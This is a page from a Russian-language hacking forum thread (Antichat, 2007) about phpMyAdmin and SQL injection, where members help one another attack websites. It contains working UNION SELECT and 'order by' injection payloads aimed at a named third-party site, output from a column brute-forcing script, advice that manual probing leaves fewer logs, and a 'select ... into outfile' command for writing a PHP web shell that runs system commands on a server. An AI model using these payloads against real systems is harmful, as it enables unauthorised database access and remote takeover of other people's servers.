HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу phpMyAdmin
   
Ответ
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 26.12.2007, 15:24
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию
http://www.google.ru/search?q=phpmyadmin+раскрытие+путей
 
Ответить с цитированием

  #12  
Старый 26.12.2007, 15:34
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию
нужен скрипт на perl'e который быстро подбирает количество столбцов при sql инекциях у кого есть пожалуйста выложите давно такой ищу
 
Ответить с цитированием

  #13  
Старый 26.12.2007, 15:42
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию
https://forum.antichat.ru/thread28461.html
https://forum.antichat.ru/threadnav24918-1-40.html
 
Ответить с цитированием

  #14  
Старый 26.12.2007, 16:01
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию
https://forum.antichat.ru/thread28461.html
по этой ссылке запускаю скрипт так
C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"
мне выдает следующее

C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"


=====_Script_Brut_Columns_=====

Wed Dec 26 16:59:16 2007

*URL:___________http://zonewm.biz/showa.php?id=129'
Evristic:______ON
Min_columns:___1
Max_columns:___50
Metod:_________UNION
SPACE:_________%20
NULL:__________1,2,3...
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log_check.txt

=====_Script_Brut_Columns_=====

GO!

Start evristic detection. Please, WAIT...

Detect MySQL

Start UNION SELECT

Please, wait...

Try 1 column...
------------------------

OK! Find 1 columns.

Right URL:
http://zonewm.biz/showa.php?id=129'%20UNION%20SELECT%201/*


что я не то делаю?
 
Ответить с цитированием

  #15  
Старый 26.12.2007, 16:09
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию
http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)
 
Ответить с цитированием

  #16  
Старый 26.12.2007, 16:12
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию
Цитата:
Сообщение от AFoST  
http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)
дело в том что нужен скрипт ручками то я подобрал дело в том что встречаются сайты у которых по 80 строк ручками подбирать придется долго
 
Ответить с цитированием

  #17  
Старый 26.12.2007, 16:17
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию
алгоритм
-1+order+by+1/*
-1+order+by+100/* ошибка -> -1+order+by+50/* нет ошибки -> -1+order+by+75/* ошибка -> -1+order+by+61/*
итд...

heks, и логов меньше оставишь, и руку набьешь)))
Последний раз редактировалось AFoST; 26.12.2007 в 16:17.. Причина: Добавил
 
Ответить с цитированием

  #18  
Старый 26.12.2007, 16:40
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию
блин давно эотел найти такой запрос пасиб AFoST
 
Ответить с цитированием

  #19  
Старый 26.12.2007, 16:47
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию
Цитата:
Сообщение от Spyder  
хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'
Никога так не заливал. Решил попробовать вот что выплюнул
Цитата:
Кажется возникла ошибка в Вашем SQL запросе. Описание ошибки от MySQL сервера дано ниже, возможно, оно поможет Вам разобраться ERROR: Неизвестная строка с пунктуацией @ 8 STR: <? SQL: select <?system($_GET[cmd])?> into outfile '/www/sait.ru/phpBB/index.php'
Выставил права на 777 и сделал строку типа <? SQL: select <?system($_GET[cmd])?>
Тоже самое.

#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php
Последний раз редактировалось Ershik; 26.12.2007 в 17:04..
 
Ответить с цитированием

  #20  
Старый 26.12.2007, 16:50
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию
<?system($_GET['cmd'])?>
Обрами в "ковычки"
 
Ответить с цитированием
Ответ
Страница 2 из 3 < 1 2 3 >



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кодировка в PhpMyAdmin Ershik PHP 10 28.12.2007 10:54
Error in simple exploit phpMyAdmin am@tory Уязвимости 11 12.12.2007 05:05
Как залить шелл через PhpMyAdmin? Buga Уязвимости CMS / форумов 15 16.02.2006 22:18
Залить remview.php через phpMyAdmin Grom PHP 8 05.02.2006 00:19
phpmyadmin dyx Болталка 1 27.04.2005 17:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.